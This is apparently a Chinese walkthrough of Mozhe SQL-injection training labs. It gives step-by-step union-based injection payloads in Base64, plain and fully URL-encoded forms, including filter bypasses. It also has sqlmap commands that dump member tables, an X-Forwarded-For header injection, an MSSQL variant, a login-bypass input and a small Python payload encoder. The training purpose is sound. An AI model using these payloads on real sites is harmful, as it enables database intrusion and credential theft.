暂停更新,没墨币了
靶场地址:https://www.mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe
http://url/show.php?id=MQo=
参数值 MQo= 经 Base64 解码为 "1" 外加一个换行符(0x0A,可能是 echo 1 | base64 带出来的,说明服务端对尾部换行不敏感),猜测此处需要将注入语句先进行 Base64 编码再放进 id 参数。
-- 原语句: id=-1
id=LTE= -- 页面返回空白,存在注入
3
-- 原语句: id=1 order by 2
id=MSBvcmRlciBieSAy -- 页面正常
-- 原语句: id=1 order by 3
id=MSBvcmRlciBieSAz -- 页面报错
-- 原语句: id=-1 union select 1,2
id=LTEgdW5pb24gc2VsZWN0IDEsMg==
test
-- 原语句: id=-1 union select 1,database()
id=LTEgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKQ==
data
-- 原语句: id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
id=LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKQ==
id,title,main,thekey
-- 原语句: id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='data'
id=LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J2RhdGEn
thekey
读取 thekey 字段内容,即可成功得到 Key
-- 原语句: id=-1 union select 1,thekey from data
id=LTEgdW5pb24gc2VsZWN0IDEsdGhla2V5IGZyb20gZGF0YQ==
靶场地址:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe
?id=1 and 1=1 --+ -- 页面正常
?id=1 and 1=2 --+ -- 页面空白
使用 order by 判断,可知此处列数为 4
id=1 order by 4 --+ -- 页面正常
id=1 order by 5 --+ -- 页面空白
SQLMap
-- 注:sqlmap 指定数据库类型的选项是 --dbms(双短横线)。原文写成 -DBMS=mysql 会被命令行解析成 -D "BMS=mysql"(把 "BMS=mysql" 当成数据库名),并不会限定 DBMS;下面已改正。
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" --dbms=mysql
stormgroup
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" --dbms=mysql --current-db
member, notice
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" --dbms=mysql -D stormgroup --tables
member
表中的字段:name, password, status
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" --dbms=mysql -D stormgroup -T member --columns
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" --dbms=mysql -D stormgroup -T member -C "name,password" --dump
靶场地址:https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe
X-Forwarded-For 头的注入:用 Burp Repeater 在请求中添加 X-Forwarded-For 字段并点击发送,可以看到响应包的弹框中出现 X-Forwarded-For 字段里设置的 IP 地址,说明这个客户端可控的头被原样带进了后端处理(应用看起来把 XFF 当成真实来源 IP 使用;XFF 只有自己的反向代理追加的那一段才可信,直接信任客户端发来的值本身就是问题)。
新建 post.txt 文件,将请求包全部内容粘贴到该文件中,并将 X-Forwarded-For 字段的值修改为 *(* 是 sqlmap 的自定义注入点标记,配合 -r 使用时 sqlmap 只测试这个位置):
POST /index.php HTTP/1.1
Host: 219.153.49.228:46500
Content-Length: 25
Cache-Control: max-age=0
Origin: http://219.153.49.228:46500
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://219.153.49.228:46500/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
X-Forwarded-For: *
username=123&password=123
将 post.txt 文件放在 SQLMap 的目录下(或者用绝对路径),然后运行 SQLMap,使用 -r 参数指定该 txt 文件;sqlmap 会从文件里读取完整请求(方法、Host、各个头、POST 体),不需要再用 -u:
webcalendar
$ python sqlmap.py -r post.txt --current-db
user, login
$ python sqlmap.py -r post.txt -D webcalendar --tables
id, username, password
$ python sqlmap.py -r post.txt -D webcalendar -T user --columns
$ python sqlmap.py -r post.txt -D webcalendar -T user -C username,password --dump
靶场地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe
id=1 and 1=1 -- 页面正常
id=1 and 1=2 -- 页面错误
4
id=1 order by 4 -- 页面正常
id=1 order by 5 -- 页面错误
id=-1
报错,从页面回显得知回显点为2、3
id=-1 union select 1,2,3,4
mozhe_Discuz_StormGroup
id=-1 union select 1,database(),3,4
StormGroup_member,notice
id=-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1),3,4
id=-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 1,1),3,4
id,name,password,status
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 0,1),3,4
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 1,1),3,4
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 2,1),3,4
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 3,1),3,4
用 limit 逐行读取账号及密码;爆出第 2 个账号及密码(password 字段存的一般是 MD5 之类的哈希,所谓"解密"其实是反查/碰撞),得到明文后登录成功
id=-1 union select 1,name,password,4 from StormGroup_member limit 0,1
id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1
靶场地址:https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe
id=tingjigonggao' and 1=1 --+ -- 页面正常
id=tingjigonggao' and 1=2 --+ -- 页面错误
4
id=tingjigonggao' order by 4 --+
id=tingjigonggao' order by 5 --+
id=x
报错,从页面回显得知回显点为2、3
id=x' union select 1,2,3,4 --+
mozhe_discuz_stormgroup
id=x' union select 1,2,database(),4 --+
notice,stormgroup_member
id=x' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database() --+
stormgroup_member
表的全部字段:id,name,password,status
id=x' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='stormgroup_member' --+
读取 name,password 字段的值
id=x' union select 1,name,password,4 from stormgroup_member limit 0,1 --+
id=x' union select 1,name,password,4 from stormgroup_member limit 1,1 --+
靶场地址:https://www.mozhe.cn/bug/detail/SXlYMWZhSm15QzM1OGpyV21BR1p2QT09bW96aGUmozhe
id=2-0 -- 返回正常
id=2-1 -- 返回错误
使用 order by 判断,可知此处列数为 4
id=2 order by 4 -- 返回正常
id=2 order by 5 -- 返回错误
id=2-0 与 id=2 结果相同、id=2-1 结果不同,说明参数直接参与了算术运算(数字型注入);要让原查询条件为 False,即 id≠2,此处用 id=-2。
这一题后端是 MSSQL(下面用到 db_name()、sysobjects、top 1),联合查询需用 union all select,而非 union select(union 隐含去重排序,若回显列是 text/ntext 类型会报"无法比较或排序"的错误,union all 不去重可以避开);第 3 个回显位为字符串型,整数字面量与它类型不兼容,需要写成 '3'。
id=-2 union all select 1,2,'3',4
mozhe_db_v2
id=-2 union all select 1,db_name(),'3',4
manage
id=-2 union all select 1,(select top 1 name from mozhe_db_v2..sysobjects where xtype='u'),'3',4
-- 也可以使用information_schema.tables
id=-2 union all select 1,(select top 1 table_name from information_schema.tables),'3',4
id,username,password
id=-2 union all select 1,(select top 1 col_name(object_id('manage'),1) from sysobjects),'3',4
id=-2 union all select 1,(select top 1 col_name(object_id('manage'),2) from sysobjects),'3',4
id=-2 union all select 1,(select top 1 col_name(object_id('manage'),3) from sysobjects),'3',4
-- 也可以使用information_schema.columns,但是使用前面的方便遍历
id=-2 union all select 1,(select top 1 column_name from information_schema.columns where table_name='manage'),'3',4
第 1 条语句爆出用户名 admin_mz,再使用第 2 条爆出密码。注意这里把 (select username from manage) 直接当标量子查询用,只有 manage 表恰好只有一行时才行;多于一行 MSSQL 会报 "Subquery returned more than 1 value",稳妥的写法是加 top 1。
id=-2 union all select 1,(select username from manage),'3',4
id=-2 union all select 1,(select username from manage),(select password from manage where username='admin_mz'),4
靶场地址:https://www.mozhe.cn/bug/detail/VlhJTTJsUm9BSmFEQlE3SEpldDBIQT09bW96aGUmozhe
Emmm这题好水,居然还收2个墨币!
用户名输入 admin,密码任意,点击登陆后跳转到 http://url/no.php,把 URL 里的 no.php 改成 yes.php,居然就显示 Key 了。。。这本身就是一个未授权访问问题:yes.php 没有校验登录状态,强制浏览即可到达。下面来一个正确的做法
用户名输入 admin111'2222,密码随意,点击登陆,页面直接回显了数据库报错(报错信息把拼接后的 SQL 片段泄露了出来,生产环境不应把数据库错误原样返回给用户):You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2222','a','a') and password='1'' at line 1
从报错片段可知用户名被拼进了形如 ('<username>','a','a') and password='...' 的语句,于是用户名输入 admin','a','a') # 来闭合括号并用 # 注释掉后面的密码条件,密码任意。点击登陆成功获取 Key
靶场地址:https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe
id=1 -- 页面正常
id=-1 -- 页面错误
order by 一直没有报错,后发现需要绕过。经查询得知此题绕过需要注意以下几点:空格用 /**/ 代替,= 用 like 代替,id=1 后面的部分整体进行 URL 编码(用下面的脚本生成)。这种编码绕过能成功,应当是过滤在 URL 解码之前做关键字匹配、而后端取到的是解码后的值;发送时要注意浏览器/Burp 不要再做一次编码或自动解码。
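#!/usr/bin/env python
# -*- coding:UTF-8 -*-
# time:2019/11/9 1:03
# author:White9527
from urllib import parse
import re


def url_encode_all(payload: str) -> str:
    """Percent-encode every byte of ``payload`` (UTF-8), e.g. ``"1,2"`` -> ``"%31%2C%32"``.

    ``urllib.parse.quote`` leaves unreserved characters (letters, digits, ``-``,
    ``_``, ``.``, ``~``) untouched, but the lab's filter rejects the bare
    keywords (``union``, ``select``, ``order by``), so nothing may stay in the
    clear.  Encoding the raw bytes directly replaces the original approach
    (quote() followed by a manual hex pass and a ``0x`` -> ``%`` substitution),
    which also passed ``"utf-8"`` as quote()'s ``safe`` parameter by mistake and
    read ``s3[j-1]``/``s3[j-2]`` with a negative index on the first two
    characters.  Hex digits are upper-case to match the payloads in these
    notes; percent-decoding is case-insensitive on the server side anyway.

    :param payload: the query-string fragment to encode (``""`` gives ``""``)
    :return: ``payload`` with every byte written as ``%XX``
    """
    return "".join("%{:02X}".format(b) for b in payload.encode("utf-8"))


# The injection fragment to encode; spaces are already written as /**/ because
# the filter blocks plain spaces (see the notes above).
s1 = "/**/order/**/by/**/1"
s4 = url_encode_all(s1)
print(s4)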
4
-- 原语句: id=1/**/order/**/by/**/4
id=1%2F%2A%2A%2F%6F%72%64%65%72%2F%2A%2A%2F%62%79%2F%2A%2A%2F%34 -- 页面正常
id=1%2F%2A%2A%2F%6F%72%64%65%72%2F%2A%2A%2F%62%79%2F%2A%2A%2F%35 -- 页面错误
id=-1
报错,从页面回显得知回显点为2、3
-- 原语句: id=-1/**/union/**/select/**/1,2,3,4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%33%2C%34
-- (原文此处误贴成了下一条 database() 语句的编码,已按原语句 1,2,3,4 修正)
mozhe_discuz_stormgroup
-- 原语句: id=-1/**/union/**/select/**/1,database(),3,4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%64%61%74%61%62%61%73%65%28%29%2C%33%2C%34
notice,stormgroup_member
-- 原语句: id=-1/**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%74%61%62%6C%65%5F%6E%61%6D%65%29%2C%33%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%73%63%68%65%6D%61%2F%2A%2A%2F%6C%69%6B%65%2F%2A%2A%2F%64%61%74%61%62%61%73%65%28%29
stormgroup_member
表中的字段名:id,name,password,status
-- 原语句: id=-1/**/union/**/select/**/1,(group_concat(column_name)),3,4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'stormgroup_member'
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%28%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%63%6F%6C%75%6D%6E%5F%6E%61%6D%65%29%29%2C%33%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%63%6F%6C%75%6D%6E%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%6E%61%6D%65%2F%2A%2A%2F%6C%69%6B%65%2F%2A%2A%2F%27%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%27
-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/0,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%30%2C%31
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%31%2C%31
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%32%2C%31
靶场地址:https://www.mozhe.cn/bug/detail/RkxnbzB6WWpWWjBuTDEyamZXNmJiQT09bW96aGUmozhe
id=1 -- 页面正常
id=-1 -- 页面错误
4
id=1/**/order/**/by/**/4 -- 页面正常
id=1/**/order/**/by/**/5 -- 页面错误
union 和 select 疑似被过滤,尝试大小写绕过无效,于是使用 URL 编码
-- 原语句: id=-1/**/union/**/select/**/1,2,3,4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%33%2C%34
mozhe_discuz_stormgroup
-- 原语句: id=-1/**/union/**/select/**/1,2,database(),4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%64%61%74%61%62%61%73%65%28%29%2C%34
notice,stormgroup_member
这里使用 group_concat() 将表名拼接后一次返回
-- 原语句: id=-1/**/union/**/select/**/1,2,group_concat(table_name),4/**/from/**/information_schema.tables/**/where/**/table_schema/**/=/**/database()
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%74%61%62%6C%65%5F%6E%61%6D%65%29%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%73%63%68%65%6D%61%2F%2A%2A%2F%3D%2F%2A%2A%2F%64%61%74%61%62%61%73%65%28%29
stormgroup_member
表中的列名:id,length,name,password,time,status
-- 原语句: id=-1/**/union/**/select/**/1,2,group_concat(column_name),4/**/from/**/information_schema.columns/**/where/**/table_name/**/=/**/'stormgroup_member'
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%63%6F%6C%75%6D%6E%5F%6E%61%6D%65%29%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%63%6F%6C%75%6D%6E%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%6E%61%6D%65%2F%2A%2A%2F%3D%2F%2A%2A%2F%27%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%27
读取 name,password 字段内容,分别爆出 3 个账号:mozhe01,mozhe2,admin。将最后一个 admin 对应的密码(MD5 哈希,不能"解密",只能到在线库反查或用字典碰撞)反查出明文后即可成功登陆并获取 Key
-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/0,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%30%2C%31
-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/1,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%31%2C%31
-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/2,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%32%2C%31
靶场地址:https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe
id=1' and 1=1 --+ -- 页面正常
id=1' and 1=2 --+ -- 页面错误
7
?id=1' order by 7 --+ -- 页面正常
?id=1' order by 8 --+ -- 页面错误
2,3,4
id=-1' union select 1,2,3,4,5,6,7 --+
min_ju4t_mel1i
id=-1' union select 1,database(),3,4,5,6,7 --+
(@dmin9_td4b},notice,stormgroup_member,tdb_goods
id=-1' union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database() --+
id,username,password,status
id=-1' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='(@dmin9_td4b}' --+
也可以用 group_concat() 函数一次拿完,但是返回的密码不方便观察,干脆使用 limit 逐个返回。注意表名 (@dmin9_td4b} 含有特殊字符,在 from 子句里必须用反引号括起来。前几个账号的 status 字段均为 0,只有最后一个的 status 为 1,猜测这个字段表示是否禁用(未验证,可分别尝试登陆确认)。
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 0,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 1,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 2,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 3,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 4,1 --+